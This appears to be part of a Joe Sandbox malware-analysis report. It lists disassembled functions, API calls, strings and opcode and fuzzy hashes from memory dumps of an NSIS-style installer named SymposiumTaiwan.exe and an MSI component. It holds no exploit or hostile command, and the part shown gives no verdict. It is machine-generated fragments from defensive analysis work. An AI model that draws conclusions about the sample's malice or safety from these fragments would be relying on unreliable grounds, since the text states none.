Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: f44bb6c3562513dda7020e6820a051beb997543d8e66d3d8cd7e3ba6e9fb5062
Instruction ID: 3ea92859cf16da61aacc8681df46b8b875e4328d43c7d9cf3449b1b59d78f199
Opcode Fuzzy Hash: f44bb6c3562513dda7020e6820a051beb997543d8e66d3d8cd7e3ba6e9fb5062
Instruction Fuzzy Hash: B2610271204215EFD214EF68C888E6BBBE9FF89704F50491DF599C7261DB31E805CB62

Function 008801DF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008803A5

Strings

%ls, xrefs: 0088021E, 00880234
%s: %s, xrefs: 008803B4

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 0dcff6691d6cf492cd42665e05642a23431d97634e0474ac1bdabf6c6ff25cab
Instruction ID: ec4fe46f5e45ee316d3f2997c5e1c873f255746048623bfe29b659c7d8fa53b4
Opcode Fuzzy Hash: 0dcff6691d6cf492cd42665e05642a23431d97634e0474ac1bdabf6c6ff25cab
Instruction Fuzzy Hash: 1251B63158C318FAEAE236948C4AF357655FF45B08F60C40AB3DAE44E6C6D1985C6F1B

Function 00897BE8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00897D54

Part of subcall function 00895D2D: IsProcessorFeaturePresent.KERNEL32(00000017,00895D1C,0000002C,008A80D0,00898D71,00000000,00000000,008963A2,?,?,00895D29,00000000,00000000,00000000,00000000,00000000), ref: 00895D2F
Part of subcall function 00895D2D: GetCurrentProcess.KERNEL32(C0000417,008A80D0,0000002C,00895A5A,00000016,008963A2), ref: 00895D51
Part of subcall function 00895D2D: TerminateProcess.KERNEL32(00000000), ref: 00895D58

Strings

., xrefs: 00897F0B
*?, xrefs: 00897C2B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 7a50fbe879ca6a48141c2b6467937ff6e70239af38ebe89cbb3f92dc445b7bef
Instruction ID: ed647cf2cb297cc4b569573e4e9cf5731a20c4f3fd93771ac52f06e43d40510c
Opcode Fuzzy Hash: 7a50fbe879ca6a48141c2b6467937ff6e70239af38ebe89cbb3f92dc445b7bef
Instruction Fuzzy Hash: 5F51C071E14209EFDF15EFA8C881ABDBBB5FF58314F28816AE854E7304E6319E018B50

Function 00877619 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0087761E
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00877799

Part of subcall function 0087A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A0D7
Part of subcall function 0087A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A108

Strings

:, xrefs: 0087768F

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 882c107a98291da641ca5b52597748c0d0a7dbaf5d2c3fb80f016460b6df1160
Instruction ID: de6db9980190bc2799407186487f804485d3b45a208e31757ae11fe435f43eb5
Opcode Fuzzy Hash: 882c107a98291da641ca5b52597748c0d0a7dbaf5d2c3fb80f016460b6df1160
Instruction Fuzzy Hash: D541B171804658A9DB28EB68DC45EEE737CFF45340F0080A9B64DE208ADB30DF85CB62

Function 0087B275 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

UNC, xrefs: 0087B311
\\?\, xrefs: 0087B2C7, 0087B303, 0087B364, 0087B3B7

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 48455bd04064a0c8d14ed6584d7c5b331e91de7488ac19ca21ae609514caf7e4
Instruction ID: fc4e8f741de9a8deddaaacb581a610aa829571831bd7bde76c5affb85de932f5
Opcode Fuzzy Hash: 48455bd04064a0c8d14ed6584d7c5b331e91de7488ac19ca21ae609514caf7e4
Instruction Fuzzy Hash: E1419231400219AADF21AF26DC42FEE77AAFF01350F10C166F95CE325AE771D9808BA1

Function 0088802D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 0088803A

Strings

Shell.Explorer, xrefs: 00888066
about:blank, xrefs: 008880D2

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 375b23bfaa6c8618006e95a0269167e541838f36978e2e127f04650e7542bab1
Instruction ID: dc0acbe324721b96f0952f4b5ec17a9ffa15b15b395bc97c74ecd5cdccd25312
Opcode Fuzzy Hash: 375b23bfaa6c8618006e95a0269167e541838f36978e2e127f04650e7542bab1
Instruction Fuzzy Hash: 8D219D75300A06EFE704BF64C894E2AB768FF85710B948229F115CB682CF71EC44CBA1

Function 008712E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0087CED7: GetWindowRect.USER32(?,?), ref: 0087CF0E
Part of subcall function 0087CED7: GetClientRect.USER32(?,?), ref: 0087CF1A
Part of subcall function 0087CED7: GetWindowLongW.USER32(?,000000F0), ref: 0087CFBB
Part of subcall function 0087CED7: GetWindowRect.USER32(?,?), ref: 0087CFE8
Part of subcall function 0087CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0087D007

GetDlgItem.USER32(00000000,00003021), ref: 0087132B
SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341

Strings

0, xrefs: 008712EA

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Window$Rect$Text$ClientItemLong
String ID: 0
API String ID: 660763476-4108050209
Opcode ID: bcf0eefe78aea653b9cf3420578d7393ed0078093e6681b03307eb6eff8c81bd
Instruction ID: 1ab7550022c24a78b0ae9b531243366a383dfe9547250092aeace982739f2747
Opcode Fuzzy Hash: bcf0eefe78aea653b9cf3420578d7393ed0078093e6681b03307eb6eff8c81bd
Instruction Fuzzy Hash: 6FF081B1540248ABEF164F64C80DAE93B59FB05754F08C014FE4CD5E95CB7DC455EB25

Function 0087FAC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,0087FD0B,?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FACD
GetLastError.KERNEL32(?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FAD9

Part of subcall function 00876DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876DF1

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0087FAE2

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d184ac91ad0f4e050bf067d041880faadbb7e6de1e43dd3a3f651b7eff22738f
Instruction ID: 8d51315843f6af177fd79d3b42ea0c59ee42eb59dc47616d2bd6aad79d552ecf
Opcode Fuzzy Hash: d184ac91ad0f4e050bf067d041880faadbb7e6de1e43dd3a3f651b7eff22738f
Instruction Fuzzy Hash: 15D05B7150883127E61137285C06E6E7D04FB13770F344715F13DE55E9EF554C514692

Analysis Process: SymposiumTaiwan.exePID: 1020, Parent PID: 3212COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12%
Total number of Nodes:	1481
Total number of Limit Nodes:	32

Executed Functions

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
OleUninitialize.OLE32(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

SeShutdownPrivilege, xrefs: 00403C42
/D=, xrefs: 004039D2
NSIS Error, xrefs: 0040390E
Error launching installer, xrefs: 00403AA9
NCRC, xrefs: 004039A8
~nsu.tmp, xrefs: 00403B23
\Temp, xrefs: 00403A47
_?=, xrefs: 00403A90

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

SetFileAttributes failed., xrefs: 004017A1
Aborting: "%s", xrefs: 0040161D
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
BringToFront, xrefs: 004016BD
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename on reboot: %s, xrefs: 00401943
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: "%s" (%d), xrefs: 004017BF
CreateDirectory: "%s" created, xrefs: 00401849
detailprint: %s, xrefs: 00401679
Call: %d, xrefs: 0040165A
Sleep(%d), xrefs: 0040169D
Jump: %d, xrefs: 00401602
Rename: %s, xrefs: 004018F8
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Rename failed: %s, xrefs: 0040194B
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: 0aacebd35cab78dd9e56fb0c34c611705e18b02e61851c41ce70807ba0770869
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: 0aacebd35cab78dd9e56fb0c34c611705e18b02e61851c41ce70807ba0770869
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNEL32(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

"F, xrefs: 00405A4B
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
RichEdit20A, xrefs: 00405BE2, 00405BE7
@jG, xrefs: 00405AF2
RichEd20, xrefs: 00405BC9
.exe, xrefs: 00405A69
RichEdit, xrefs: 00405BF0
RichEd32, xrefs: 00405BD4
.DEFAULT\Control Panel\International, xrefs: 004059C5
F, xrefs: 00405A22
_Nb, xrefs: 00405AFD

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
